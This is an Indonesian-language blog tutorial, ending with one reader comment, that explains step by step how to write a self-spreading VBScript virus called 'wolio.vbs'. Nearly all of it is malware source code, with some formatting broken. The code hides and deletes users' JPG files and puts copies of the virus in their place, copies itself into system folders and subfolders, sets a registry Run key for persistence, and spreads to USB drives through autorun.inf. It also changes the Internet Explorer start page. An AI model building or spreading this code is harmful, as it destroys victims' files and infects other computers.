Artikel kali ini akan membahas bagaimana cara membuat virus melalui Notepad denganmenggunakan Visual Basic Script(VBS).
Sebelumnya kita ketahui dahulu sistem kerjanya adalah sebagai berikut :
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelahitu merubahekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file,sehingga akandikira file tersebut terhapus.2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows.3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart.4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer.
Nah, Untuk lebih jelasnya kita akan pelajari dari script dibawah ini :
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG danmerubahnya sesuai dengan cara kerja diatas :
Sub serangan_jpg(target)on error resume next set ftarget=fso.GetFile(target)set fsource = fso.GetFile(Wscript.ScriptFullName)ftarget.Copy(Left(target,instrrev(target,".")) & "jpeg")set fbackup = fso.GetFile(Left(target,instrrev(target,".")) & "jpeg")fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,".")) & "jpg " & ".vbs")ftarget.Deleteftarget.Closefsource.CloseEnd SubSub carifilejpg(folder)For Each filetarget in fso.GetFolder(folder).FilesIf (Right(filetarget,3)="jpg") then serangan_jpg(filetarget)Next End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk mediaflashdisk dan kemudian menularinya.
Sub serangan_drive()Set fso = CreateObject("Scripting.FileSystemObject")Set Drives=fso.drivesadaflashdisk = False
For Each drive in DrivesIf drive.isready Thenfsource.Copy(drive & "" & "wolio.vbs")If drive.DriveType = 1 And drive.DriveLetter > "C:" Then adaflashdisk = TrueEnd If Next If adaflashdisk = True Thenset fileautorun = fso.CreateTextFile(drive.DriveLetter & "" & "autorun.inf",False)fileautorun.WriteLine("[AUTORUN]")fileautorun.WriteLine("RUN=wolio.vbs")End If End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTMLyang diinginkan.
Sub serangan_ie()If (regedit.RegRead("HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start Page")<>"c:\windows\system32\wolio.html") Thenregedit.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","c:\windows\system32\wolio.html" End If End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan scriptvirus
Sub buat_html()set filehtml = fso.CreateTextFile("c:windowssystem32wolio.html",True)filehtml.WriteLine("")filehtml.WriteLine("")")filehtml.WriteLine("Welcome to Wolio")filehtml.WriteLine("filehtml.WriteLine("")filehtml.WriteLine("")filehtml.WriteLine("")filehtml.WriteLine("")filehtml.WriteLine("")filehtml.WriteLine("Selamat Datang di Wolio VBS ")filehtml.WriteLine("")filehtml.WriteLine("")End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)on error resume next For Each subfolder in fso.GetFolder(foldername).SubFoldersfsource.Copy(subfolder & "wolio.vbs")carifilejpg(subfolder)next End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk menyebarkan variabeldan memangggil semua prosedur.
on error resume next dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys,regedit, drive,filehtml, fileautorundim adaflashdisk set fso = CreateObject("Scripting.FileSystemObject")set fsource = fso.GetFile(Wscript.ScriptFullName)set regedit=CreateObject("WScript.Shell")myfolder = Left(fsource,InStrRev(fsource,""))' Copy-kan diri ke "c:windowssystem32" fsource.Copy("c:windowssystem32wolio.vbs")' Cari dan infeksi file JPG didalam folder carifilejpg(myfolder)' Copy-kan diri di sub folder yang adaserangan_folder(myfolder)' Regitryif (regedit.RegRead("HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio")<>"c:\windows\system32\wolio.vbs") Thenregedit.RegWrite"HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio","c:\windows\system32\wolio.vbs" End If ' Copy-kan diri ke semua drive aktif serangan_drive()' Buat file wolio.html buat_html()' Ubah Start Page di Internet Explorer serangan_ie()
itu langsung save as file jpg/png/bmp sript nya jalan gk
BalasHapus